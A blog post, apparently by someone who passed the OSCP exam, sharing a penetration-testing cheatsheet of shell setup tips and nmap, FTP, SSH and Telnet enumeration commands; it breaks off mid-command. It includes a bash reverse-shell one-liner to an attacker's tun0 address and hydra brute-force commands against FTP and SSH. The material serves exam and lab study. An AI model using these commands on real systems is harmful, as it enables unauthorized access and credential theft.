My OSCP Pentesting Cheatsheet | HackerAsk<br>Post<br>Cancel<br>My OSCP Pentesting Cheatsheet<br>Contents My OSCP Pentesting Cheatsheet
I had my OSCP exam on 14.03.2025 and on 17 March, three days later, I already received the confirmation, that I had passed the OSCP exam!<br>This is my compiled and comprehensive list of useful commands that I have documented in my personal knowledge base. In this blog post, I can find useful tips and commands about network and service enumeration, password guessing, reverse shells, Active Directory and Windows post exploitation that can be useful for penetration testing and the OSCP exam.<br>Some useful Tips<br>.env file<br>I created a separate directory for each machine that I hacked during my preparation and the OSCP exam. I then created an .env file in each of these directories and stored useful environment variables such as $TARGET_IP and $TARGET_DOMAIN in them:
export TARGET_IP="10.10.10.11"<br>export TARGET_DOMAIN="hackerask.com"
Then I could simply source the .env file whenever I wanted to work on this machine:
source .env
This is especially useful when you are working with multiple terminal tabs.<br>You can also use this file to store other environment variables that you use frequently, such as credentials or to run scripts, such as starting a terminal logger.<br>$myip environment variable<br>I found it quite useful to have my IP address in a $myip environment variable. Since all the hacking lab platforms I use, such as HackTheBox, Proving Grounds or the challenge labs for my OSCP exam, use OpenVPN to get access to the machines, we can look at the tun0 network interface to see our local VPN IP address. We can look at it with ifconfig tun0 or ip addr show tun0.<br>To avoid having to type in the IP address every time I need it, I created a $myip environment variable that looks like this:
export myip=$(ip addr show tun0 2> /dev/null | grep 'inet ' | awk '{print $2}' | cut -d'/' -f1)
We can add the export line to our .bashrc or .zshrc and then source the file, to be able to use the environment variable:
$ echo -n "/bin/bash -i >& /dev/tcp/$myip/5555 0>&1"
/bin/bash -i >& /dev/tcp/192.168.178.10/5555 0>&1
This will output the reverse shell payload with our IP address of the tun0 network interface.<br>Copy Alias<br>I often have to copy the output of commands from the terminal to document them in my notes. Therefore I created an easy copy alias to pipe the output of an command into the clipboard.<br>I decided to use xclip, which can be installed with apt:
sudo apt install xclip
To create the alias, we can add the following line to the .bashrc or .zshrc file:
alias copy='xclip -selection clipboard'
And then restart the terminal session or source the file to be able to use it.<br>We can use the copy alias, by appending it with a pipe:
echo -n "/bin/bash -i >& /dev/tcp/$myip/5555 0>&1" | copy
This will pipe the output of the echo command, the reverse-shell payload, to our clipboard.<br>Tmux<br>You should definitely learn and use tmux for the OSCP and for doing penetration tests/red team assignments. tmux is an excellent terminal multiplexer that allows you to manage multiple tabs and screens within a single window, making it easy to switch between various tabs with easy keyboard shortcuts.<br>Tmux Cheat Sheet & Quick Reference<br>Network Enumeration<br>General<br>Host Discovery
nmap -sn 192.168.178.1-254 -vv -oA hosts
cat hosts.nmap | grep "report for" | grep -v "down" | cut -f5 -d ' '
If nmap does not work, we can also try to ping the hosts:
for i in $(seq 1 254); do ping "172.16.115.$i" -c 1 -W 0.1|grep "icmp_seq=1"|cut -f4 -d ' '|tr ':' ' '; done
Port Scanning<br>My first step is usually to scan the machine quickly with nmap for open TCP ports:
$ sudo nmap -p- -vvv $TARGET_IP -oN enum/nmap/quick-scan.txt
Then I can use the following command to get all ports comma separated as output:
$ cat enum/nmap/quick-scan.txt | grep '/tcp' | cut -f1 -d '/' | tr '\n' ',' | sed 's/\(.*\),/\1 /'
Then we can use the open ports to do a more detailed version scan:
$ nmap -p -sC -sV -oA enum/nmap/resource $TARGET_IP
After scanning the TCP ports, we should not forget to scan for UDP ports as well:
$ sudo nmap -Pn -n $TARGET_IP -sUV --top-ports=100 --reason -oA enum/nmap/resource-udp
TCP<br>21 - FTP<br>Anonymous Login:
ftp ftp://anonymous:anonymous@$TARGET_IP
Banner grabbing:
nc -vn $TARGET_IP 21
Download all files:
wget -m ftp://anonymous:anonymous@$TARGET_IP<br>wget -r --user="USERNAME" --password="PASSWORD" ftp://$TARGET_IP/
Brutefoce:
hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt $TARGET_IP ftp
22 - SSH<br>Nmap:
# Check Authentication Methods:<br>nmap -p22 $TARGET_IP --script ssh-auth-methods --script-args="ssh.user=root"
# Retrieve Version<br>nmap -p22 $TARGET_IP -sV
Brutefoce:
hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt $TARGET_IP ssh
23 - Telnet<br>Banner Grabbing:
nc -vn $TARGET_IP 23
Nmap Enumeration:
nmap -n -sV -Pn --script...